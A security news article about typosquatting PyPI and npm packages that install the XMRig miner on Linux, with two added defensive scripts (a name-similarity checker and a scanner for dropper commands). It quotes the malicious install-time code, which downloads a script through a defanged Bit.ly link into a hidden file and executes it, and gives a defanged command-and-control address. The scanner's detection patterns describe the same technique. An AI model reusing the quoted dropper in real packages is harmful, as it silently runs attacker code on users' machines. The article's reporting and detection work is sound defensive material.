Malware authors keep turning out new samples day after day, and the latest example comes from the public package repositories: security experts have again found malicious code in PyPI and npm, this time more than 200 typosquatting npm packages carrying cryptocurrency miners for Linux systems.
Hauke Lübbers, an independent security researcher, first noticed the problem and found "at least 33 packages" of this kind on PyPI. Their payload is the XMRig miner, which is typically used to mine the Monero cryptocurrency.
Developers usually install packages from the terminal, where a typo in the package name is easy to make. Typosquatting exploits exactly that: the malicious packages in this campaign imitated the names of React, argparse and AIOHTTP, so that a user who misspelled the name of the genuine, popular package ended up installing the attacker's copy instead. This is how the payload was spread to many different systems.
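As an added illustration of the defensive side of typosquatting (this is not code from the article or from the researcher it cites), the following Python script compares the names a project asks for against a small, constructed allowlist of well-known packages and flags near-misses. Names are normalised the way PyPI does (case-folded, with runs of `-`, `_` and `.` collapsed) before an edit distance is computed; the allowlist, the threshold of two edits and the sample inputs are all assumptions made for the example.

```python
"""Flag dependency names that are near-misses of well-known packages (typosquat check)."""
import re

# Constructed allowlist of popular package names; a real check would use a registry snapshot.
POPULAR = ["react", "argparse", "aiohttp", "requests", "numpy", "urllib3"]


def normalize(name: str) -> str:
    """PEP 503 style normalization: case-fold and collapse runs of -, _ and . into a single '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert / delete / substitute) computed with a rolling row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # deletion
                           cur[j - 1] + 1,         # insertion
                           prev[j - 1] + (ca != cb)))  # substitution (0 if equal)
        prev = cur
    return prev[-1]


def find_typosquats(requested, popular=POPULAR, max_distance=2):
    """Return (requested_name, suspected_target, distance) for every requested name that is
    close to, but not identical with, a popular package. Exact matches are treated as trusted."""
    hits = []
    pop_norm = {normalize(p): p for p in popular}
    for req in requested:
        n = normalize(req)
        if n in pop_norm:
            continue
        distance, target = min(((levenshtein(n, p), orig) for p, orig in pop_norm.items()),
                               key=lambda t: t[0])
        if distance <= max_distance:
            hits.append((req, target, distance))
    return hits


if __name__ == "__main__":
    # Constructed requirements list: three misspellings, one exact match, one unrelated name.
    for req, target, dist in find_typosquats(["aiohtp", "argparce", "reacct", "requests", "flask"]):
        print(f"{req!r} is {dist} edit(s) away from {target!r}: review before installing")
```

A check like this belongs in the place where dependencies are resolved (a lockfile review, a CI step or a private proxy), so that a near-miss is surfaced before the package's install-time code ever runs.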
Most striking of all, while Hauke Lübbers was still reporting his findings to the PyPI administrators, the attacker brazenly published 22 further malicious packages carrying the same payload.
The researcher also notes that all of these packages targeted Linux systems specifically. Each of them contained a code fragment that used the Bit.ly URL-shortening service to download a Bash script from the attackers' servers:
import os

# Download the dropper via the shortener into a hidden file, suppressing all output (URL defanged)
os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
# Make the hidden file executable
os.system("chmod +x .cmc >/dev/null 2>&1")
# Run it
os.system("./.cmc >/dev/null 2>&1")
Hauke Lübbers further revealed that the Bit.ly link redirects to 80.78.25[.]140:8000, and that the script then reports back to its operator, the attacker, with the compromised host's IP address and a confirmation that the miner was deployed successfully.
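The install-time dropper pattern described above (shell out to wget with a shortened URL, write a hidden file, chmod +x it, run it, silence everything) is something a defender can look for before installing. The following Python script is an added example, not the article's or the researcher's code: it parses a package's setup.py with the standard `ast` module, collects every string literal handed to `os.system` or `subprocess`, and matches it against a list of indicators. The sample setup.py is constructed for the example, modelled on the defanged fragment quoted above, and the indicator list is an assumption rather than a complete signature set.

```python
"""Scan Python package source for the shell-dropper pattern seen in the typosquatting packages."""
import ast
import re

# Constructed sample setup.py modelled on the defanged fragment quoted in the article.
SAMPLE_SETUP_PY = '''
import os
from setuptools import setup

os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")

setup(name="aiohtp", version="0.0.1")
'''

# Each indicator is a label plus a regex applied to the command string passed to the shell.
# The bit.ly pattern also accepts the defanged "bit[.]ly" spelling used in reports.
INDICATORS = [
    ("downloads via URL shortener", re.compile(r"\b(wget|curl)\b.*\bbit\[?\.\]?ly\b")),
    ("writes a hidden file", re.compile(r"-O\s+\./\.\S+")),
    ("marks a hidden file executable", re.compile(r"\bchmod\s+\+x\s+\.\S+")),
    ("executes a hidden file", re.compile(r"^\s*\./\.\S+")),
    ("silences output", re.compile(r">/dev/null\s+2>&1")),
]

# Call sites whose first argument is handed to a shell or process (module, attribute).
SHELL_CALLS = {("os", "system"), ("os", "popen"), ("subprocess", "run"),
               ("subprocess", "call"), ("subprocess", "check_output"), ("subprocess", "Popen")}


def _dotted(node):
    """Return (module, attr) for an expression like os.system, else None."""
    if isinstance(node, ast.Attribute) and isinstance(node.value, ast.Name):
        return (node.value.id, node.attr)
    return None


def shell_commands(source: str):
    """Yield (lineno, command) for every shell/process call whose first argument is a string literal."""
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _dotted(node.func) in SHELL_CALLS and node.args:
            arg = node.args[0]
            if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
                yield node.lineno, arg.value


def scan(source: str):
    """Return a list of (lineno, label, command) findings for the given Python source."""
    findings = []
    for lineno, cmd in shell_commands(source):
        for label, pattern in INDICATORS:
            if pattern.search(cmd):
                findings.append((lineno, label, cmd))
    return findings


if __name__ == "__main__":
    for lineno, label, cmd in scan(SAMPLE_SETUP_PY):
        print(f"line {lineno}: {label}: {cmd}")
```

Because the scan works on the syntax tree rather than on raw text, it also catches the same calls when they are buried in a helper function or a class body; it will not see commands assembled at runtime from pieces, which is a reason to treat any shell call at all in install-time code as worth a manual look.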